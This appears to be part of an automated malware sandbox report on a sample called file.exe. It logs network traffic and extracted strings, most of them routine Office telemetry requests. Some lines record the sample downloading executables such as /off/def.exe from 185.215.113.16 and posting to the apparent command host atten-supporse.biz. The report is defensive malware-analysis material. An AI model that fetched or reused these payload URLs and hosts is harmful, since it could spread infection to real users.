Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic DNS traffic detected: DNS query: mdec.nelreports.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: file.exe, 00000000.00000003.2406591224.0000000000850000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2406591224.0000000000850000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/e
Source: file.exe, 00000000.00000003.2406676176.0000000000820000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2406591224.0000000000850000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2506465781.00000000004FA000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000002.2506779993.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.2406676176.0000000000820000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2506779993.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez
Source: file.exe, 00000000.00000003.2406676176.0000000000820000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2506779993.00000000007D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000000.00000003.2416710241.00000000007C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exeicrosoft
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2406624241.000000000082A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microx
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_105.6.dr String found in binary or memory: http://schema.org/Organization
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2212728012.00000000053AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2163463992.00000000053BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2163332664.00000000053BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2163389534.00000000053BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_105.6.dr, chromecache_106.6.dr String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_97.6.dr, chromecache_86.6.dr String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_105.6.dr String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: file.exe, 00000000.00000003.2416710241.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2406624241.000000000082F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: file.exe, 00000000.00000003.2212159074.000000000537B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2279673811.0000000005371000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211464582.0000000005377000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214165102.000000000537B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238295310.0000000005378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz//
